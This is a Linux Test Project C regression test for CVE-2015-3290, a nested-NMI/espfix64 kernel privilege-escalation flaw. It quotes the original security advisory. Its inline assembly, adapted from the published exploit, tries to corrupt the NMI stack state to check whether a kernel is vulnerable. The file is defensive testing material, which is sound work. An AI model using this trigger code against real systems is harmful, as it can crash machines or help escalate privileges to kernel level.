You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
484 lines
13 KiB
484 lines
13 KiB
// SPDX-License-Identifier: GPL-2.0-or-later
|
|
/*
|
|
* Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com>
|
|
*/
|
|
|
|
/*
|
|
|
|
NOTE: rather than checking for full nested NMI exploitation we simply check
|
|
that the NMI stack state can be corrupted with this code.
|
|
|
|
http://www.openwall.com/lists/oss-security/2015/08/04/8
|
|
|
|
> +++++ CVE-2015-3290 +++++
|
|
>
|
|
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed
|
|
by:
|
|
>
|
|
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
|
|
>
|
|
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
|
|
>
|
|
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
|
|
> perf_event_open using seccomp. A fully-functional, portable, reliable
|
|
> exploit is privately available and will be published in a week or two.
|
|
> *Patch your systems*
|
|
|
|
And here's a real advisory:
|
|
|
|
If an NMI returns via espfix64 and is interrupted during espfix64 setup
|
|
by another NMI, the return state is corrupt. This is exploitable for
|
|
reliable privilege escalation on any Linux x86_64 system in which
|
|
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
|
|
nested.
|
|
|
|
Glossing over a lot of details, the basic structure of Linux' nested NMI
|
|
handling is:
|
|
|
|
nmi_handler:
|
|
if (in_nmi) {
|
|
nmi_latched = true;
|
|
return;
|
|
}
|
|
in_nmi = true;
|
|
handle the nmi;
|
|
atomically (this is magic):
|
|
if (nmi_latched) {
|
|
nmi_latched = false;
|
|
start over;
|
|
} else {
|
|
in_nmi = false;
|
|
return and unmask NMIs;
|
|
}
|
|
|
|
Alas, on x86_64, there is no reasonable way to block NMIs to run the
|
|
atomic part of that pseudocode atomically. Instead, the entire atomic
|
|
piece is implemented by the single instruction IRET.
|
|
|
|
But x86_64 is more broken than just that. The IRET instruction does not
|
|
restore register state correctly [1] when returning to a 16-bit stack
|
|
segment. x86_64 has a complicated workaround called espfix64. If
|
|
espfix64 is invoked on return, a well-behaved IRET is emulated by a
|
|
complicated scheme that involves manually switching stacks. During the
|
|
stack switch, there is a window of approximately 19 instructions between
|
|
the start of espfix64's access to the original stack and when espfix64
|
|
is done with the original stack. If a nested NMI occurs during this
|
|
window, then the atomic part of the basic nested NMI algorithm is
|
|
observably non-atomic.
|
|
|
|
Depending on exactly where in this window the nested NMI hits, the
|
|
results vary. Most nested NMIs will corrupt the return context and
|
|
crash the calling process. Some are harmless except that the nested NMI
|
|
gets ignored. There is a two-instruction window in which the return
|
|
context ends up with user-controlled RIP and CS set to __KERNEL_CS.
|
|
|
|
A careful exploit (attached) can recover from all the crashy failures
|
|
and can regenerate a valid *privileged* state if a nested NMI occurs
|
|
during the two-instruction window. This exploit appears to work
|
|
reasonably quickly across a fairly wide range of Linux versions.
|
|
|
|
If you have SMEP, this exploit is likely to panic the system. Writing
|
|
a usable exploit against a SMEP system would be considerably more
|
|
challenging, but it's surely possible.
|
|
|
|
Measures like UDEREF are unlikely to help, because this bug is outside
|
|
any region that can be protected using paging or segmentation tricks.
|
|
However, recent grsecurity kernels seem to forcibly disable espfix64, so
|
|
they're not vulnerable in the first place.
|
|
|
|
A couple of notes:
|
|
|
|
- This exploit's payload just prints the text "CPL0". The exploit
|
|
will keep going after printing CPL0 so you can enjoy seeing the
|
|
frequency with which it wins. Interested parties could easily
|
|
write different payloads. I doubt that any existing exploit
|
|
mitigation techniques would be useful against this type of
|
|
attack.
|
|
|
|
- If you are using a kernel older than v4.1, a 64-bit build of the
|
|
exploit will trigger a signal handling bug and crash. Defenders
|
|
should not rejoice, because the exploit works fine when build
|
|
as a 32-bit binary or (so I'm told) as an x32 binary.
|
|
|
|
- This is the first exploit I've ever written that contains genuine
|
|
hexadecimal code. The more assembly-minded among you can have
|
|
fun figuring out why :)
|
|
|
|
[1] By "correctly", I mean that the register state ends up different
|
|
from that which was saved in the stack frame, not that the
|
|
implementation doesn't match the spec in the microcode author's minds.
|
|
The spec is simply broken (differently on AMD and Intel hardware,
|
|
perhaps unsurprisingly.)
|
|
|
|
--Andy
|
|
*/
|
|
|
|
#include "config.h"
|
|
#include "tst_test.h"
|
|
#include "tst_timer.h"
|
|
|
|
#if HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__))
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <inttypes.h>
|
|
#include <asm/ldt.h>
|
|
#include <unistd.h>
|
|
#include <sys/syscall.h>
|
|
#include <setjmp.h>
|
|
#include <signal.h>
|
|
#include <string.h>
|
|
#include <sys/wait.h>
|
|
#include <linux/perf_event.h>
|
|
|
|
#include "lapi/syscalls.h"
|
|
#include "tst_safe_pthread.h"
|
|
|
|
/* Abstractions for some 32-bit vs 64-bit differences. */
|
|
#ifdef __x86_64__
|
|
# define REG_IP REG_RIP
|
|
# define REG_SP REG_RSP
|
|
# define REG_AX REG_RAX
|
|
|
|
struct selectors {
|
|
unsigned short cs, gs, fs, ss;
|
|
};
|
|
|
|
LTP_ATTRIBUTE_UNUSED
|
|
static unsigned short *ssptr(ucontext_t *ctx)
|
|
{
|
|
struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
|
|
return &sels->ss;
|
|
}
|
|
|
|
LTP_ATTRIBUTE_UNUSED
|
|
static unsigned short *csptr(ucontext_t *ctx)
|
|
{
|
|
struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
|
|
return &sels->cs;
|
|
}
|
|
#else
|
|
# define REG_IP REG_EIP
|
|
# define REG_SP REG_ESP
|
|
# define REG_AX REG_EAX
|
|
# define REG_CR2 (REG_SS + 3)
|
|
|
|
LTP_ATTRIBUTE_UNUSED
|
|
static greg_t *ssptr(ucontext_t *ctx)
|
|
{
|
|
return &ctx->uc_mcontext.gregs[REG_SS];
|
|
}
|
|
|
|
LTP_ATTRIBUTE_UNUSED
|
|
static greg_t *csptr(ucontext_t *ctx)
|
|
{
|
|
return &ctx->uc_mcontext.gregs[REG_CS];
|
|
}
|
|
#endif
|
|
|
|
static volatile long expected_rsp;
|
|
static int running = 1;
|
|
|
|
static void set_ldt(void)
|
|
{
|
|
/* Boring 16-bit data segment. */
|
|
const struct user_desc data_desc = {
|
|
.entry_number = 0,
|
|
.base_addr = 0,
|
|
.limit = 0xfffff,
|
|
.seg_32bit = 0,
|
|
.contents = 0, /* Data, expand-up */
|
|
.read_exec_only = 0,
|
|
.limit_in_pages = 0,
|
|
.seg_not_present = 0,
|
|
.useable = 0
|
|
};
|
|
|
|
TEST(tst_syscall(__NR_modify_ldt, 1, &data_desc, sizeof(data_desc)));
|
|
if (TST_RET == -EINVAL) {
|
|
tst_brk(TCONF | TRERRNO,
|
|
"modify_ldt: 16-bit data segments are probably disabled");
|
|
} else if (TST_RET != 0) {
|
|
tst_brk(TBROK | TRERRNO, "modify_ldt");
|
|
}
|
|
}
|
|
|
|
static void try_corrupt_stack(unsigned short orig_ss)
|
|
{
|
|
#ifdef __x86_64__
|
|
asm volatile (
|
|
/* A small puzzle for the curious reader. */
|
|
"mov $2048, %%rbp \n\t"
|
|
|
|
/* Save rsp for diagnostics */
|
|
"mov %%rsp, %[expected_rsp] \n\t"
|
|
|
|
/*
|
|
* Let 'er rip.
|
|
*/
|
|
"mov %[ss], %%ss \n\t" /* begin corruption */
|
|
"movl $1000, %%edx \n\t"
|
|
"1: decl %%edx \n\t"
|
|
"jnz 1b \n\t"
|
|
"mov %%ss, %%eax \n\t" /* grab SS to display */
|
|
|
|
/* Did we enter CPL0? */
|
|
"mov %%cs, %%dx \n\t"
|
|
"testw $3, %%dx \n\t"
|
|
"jnz 2f \n\t"
|
|
"leaq 3f(%%rip), %%rcx \n\t"
|
|
"movl $0x200, %%r11d \n\t"
|
|
"sysretq \n\t"
|
|
"2: \n\t"
|
|
|
|
/*
|
|
* Stop further corruption. We need to check CPL
|
|
* first because we need RPL == CPL.
|
|
*/
|
|
"mov %[orig_ss], %%ss \n\t" /* end corruption */
|
|
|
|
"subq $128, %%rsp \n\t"
|
|
"pushfq \n\t"
|
|
"testl $(1<<9),(%%rsp) \n\t"
|
|
"addq $136, %%rsp \n\t"
|
|
"jz 3f \n\t"
|
|
"cmpl %[ss], %%eax \n\t"
|
|
"je 4f \n\t"
|
|
"3: int3 \n\t"
|
|
"4: \n\t"
|
|
: [expected_rsp] "=m" (expected_rsp)
|
|
: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
|
|
: "rax", "rcx", "rdx", "rbp", "r11", "flags"
|
|
);
|
|
#else
|
|
asm volatile (
|
|
/* A small puzzle for the curious reader. */
|
|
"mov %%ebp, %%esi \n\t"
|
|
"mov $2048, %%ebp \n\t"
|
|
|
|
/* Save rsp for diagnostics */
|
|
"mov %%esp, %[expected_rsp] \n\t"
|
|
|
|
/*
|
|
* Let 'er rip.
|
|
*/
|
|
"mov %[ss], %%ss \n\t" /* begin corruption */
|
|
"movl $1000, %%edx \n\t"
|
|
"1: .byte 0xff, 0xca \n\t" /* decl %edx */
|
|
"jnz 1b \n\t"
|
|
"mov %%ss, %%eax \n\t" /* grab SS to display */
|
|
|
|
/* Did we enter CPL0? */
|
|
"mov %%cs, %%dx \n\t"
|
|
"testw $3, %%dx \n\t"
|
|
"jnz 2f \n\t"
|
|
".code64 \n\t"
|
|
"leaq 3f(%%rip), %%rcx \n\t"
|
|
"movl $0x200, %%r11d \n\t"
|
|
"sysretl \n\t"
|
|
".code32 \n\t"
|
|
"2: \n\t"
|
|
|
|
/*
|
|
* Stop further corruption. We need to check CPL
|
|
* first because we need RPL == CPL.
|
|
*/
|
|
"mov %[orig_ss], %%ss \n\t" /* end corruption */
|
|
|
|
"pushf \n\t"
|
|
"testl $(1<<9),(%%esp) \n\t"
|
|
"addl $4, %%esp \n\t"
|
|
"jz 3f \n\t"
|
|
"cmpl %[ss], %%eax \n\t"
|
|
"je 4f \n\t"
|
|
"3: int3 \n\t"
|
|
"4: mov %%esi, %%ebp \n\t"
|
|
: [expected_rsp] "=m" (expected_rsp)
|
|
: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
|
|
: "eax", "ecx", "edx", "esi", "flags"
|
|
);
|
|
#endif
|
|
}
|
|
|
|
static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
|
|
int cpu, int group_fd, unsigned long flags)
|
|
{
|
|
int ret;
|
|
|
|
ret = tst_syscall(__NR_perf_event_open, hw_event, pid, cpu,
|
|
group_fd, flags);
|
|
return ret;
|
|
}
|
|
|
|
static int event_mlock_kb;
|
|
static int max_sample_rate;
|
|
|
|
static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED)
|
|
{
|
|
long niter = 0;
|
|
unsigned short orig_ss;
|
|
|
|
struct perf_event_attr pe = {
|
|
.size = sizeof(struct perf_event_attr),
|
|
.disabled = 0,
|
|
.exclude_kernel = 0,
|
|
.exclude_hv = 0,
|
|
.freq = 1,
|
|
.sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
|
|
PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
|
|
PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
|
|
};
|
|
/* Workaround bug in GCC 4.4.7 (CentOS6) */
|
|
pe.sample_freq = max_sample_rate / 5;
|
|
|
|
struct {
|
|
uint32_t type;
|
|
uint64_t config;
|
|
const char *name;
|
|
} perf_events[] = {
|
|
{
|
|
.type = PERF_TYPE_HARDWARE,
|
|
.config = PERF_COUNT_HW_INSTRUCTIONS,
|
|
.name = "hw instructions",
|
|
},
|
|
{
|
|
.type = PERF_TYPE_HARDWARE,
|
|
.config = PERF_COUNT_HW_CACHE_REFERENCES,
|
|
.name = "hw cache references",
|
|
},
|
|
};
|
|
|
|
void *perf_mmaps[ARRAY_SIZE(perf_events)];
|
|
unsigned int i;
|
|
|
|
for (i = 0; i < ARRAY_SIZE(perf_events); i++) {
|
|
int fd;
|
|
|
|
pe.type = perf_events[i].type;
|
|
pe.config = perf_events[i].config;
|
|
|
|
fd = perf_event_open(&pe, 0, -1, -1, 0);
|
|
if (fd == -1) {
|
|
if (errno == EINVAL || errno == ENOENT ||
|
|
errno == EBUSY)
|
|
tst_brk(TCONF | TERRNO,
|
|
"no hardware counters");
|
|
else
|
|
tst_brk(TBROK | TERRNO, "perf_event_open");
|
|
/* tst_brk exits */
|
|
}
|
|
|
|
perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024,
|
|
PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
|
|
SAFE_CLOSE(fd);
|
|
}
|
|
|
|
asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));
|
|
|
|
for (niter = 0; running && niter < 1000*1000*1000L; niter++) {
|
|
|
|
try_corrupt_stack(orig_ss);
|
|
|
|
/*
|
|
* If we ended up with IF == 0, there's no easy way to fix
|
|
* it. Instead, make frequent syscalls to avoid hanging
|
|
* the system.
|
|
*/
|
|
syscall(0x3fffffff);
|
|
}
|
|
|
|
for (i = 0; i < ARRAY_SIZE(perf_events); i++)
|
|
if (perf_mmaps[i] != MAP_FAILED)
|
|
SAFE_MUNMAP(perf_mmaps[i], 512 * 1024);
|
|
|
|
return (void *)niter;
|
|
}
|
|
|
|
#define TIMEOUT (180)
|
|
#define TIME_TO_GIVEUP (TIMEOUT - 5)
|
|
#define TIMER_TYPE CLOCK_MONOTONIC
|
|
|
|
static void do_child(void)
|
|
{
|
|
int i, ncpus;
|
|
pthread_t *threads;
|
|
long iter, total_iter = 0;
|
|
|
|
tst_res(TINFO, "attempting to corrupt nested NMI stack state");
|
|
|
|
set_ldt();
|
|
|
|
ncpus = tst_ncpus();
|
|
threads = SAFE_MALLOC(sizeof(*threads) * ncpus);
|
|
|
|
for (i = 0; i < ncpus; i++)
|
|
SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL);
|
|
|
|
sleep(TIME_TO_GIVEUP);
|
|
running = 0;
|
|
|
|
for (i = 0; i < ncpus; i++) {
|
|
SAFE_PTHREAD_JOIN(threads[i], (void **)&iter);
|
|
total_iter += iter;
|
|
}
|
|
free(threads);
|
|
|
|
tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations",
|
|
total_iter);
|
|
}
|
|
|
|
static void setup(void)
|
|
{
|
|
/*
|
|
* According to perf_event_open's manpage, the official way of
|
|
* knowing if perf_event_open() support is enabled is checking for
|
|
* the existence of the file /proc/sys/kernel/perf_event_paranoid.
|
|
*/
|
|
if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
|
|
tst_brk(TCONF, "Kernel doesn't have perf_event support");
|
|
|
|
SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
|
|
"%d", &event_mlock_kb);
|
|
SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
|
|
"%d", &max_sample_rate);
|
|
}
|
|
|
|
static void run(void)
|
|
{
|
|
pid_t pid;
|
|
int status;
|
|
|
|
|
|
pid = SAFE_FORK();
|
|
if (pid == 0) {
|
|
do_child();
|
|
return;
|
|
}
|
|
|
|
SAFE_WAITPID(pid, &status, 0);
|
|
if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV)
|
|
tst_res(TFAIL, "corrupted NMI stack");
|
|
else if (WIFEXITED(status) && WEXITSTATUS(status) != 0)
|
|
tst_res(WEXITSTATUS(status), "Propogate child status");
|
|
}
|
|
|
|
static struct tst_test test = {
|
|
.forks_child = 1,
|
|
.needs_root = 1,
|
|
.needs_checkpoints = 1,
|
|
.setup = setup,
|
|
.timeout = TIMEOUT,
|
|
.test_all = run,
|
|
.tags = (const struct tst_tag[]) {
|
|
{"linux-git", "9b6e6a8334d5"},
|
|
{"CVE", "2015-3290"},
|
|
{}
|
|
}
|
|
};
|
|
|
|
#else /* HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__)) */
|
|
|
|
TST_TEST_TCONF("no perf_event_attr or not (i386 or x86_64)");
|
|
|
|
#endif
|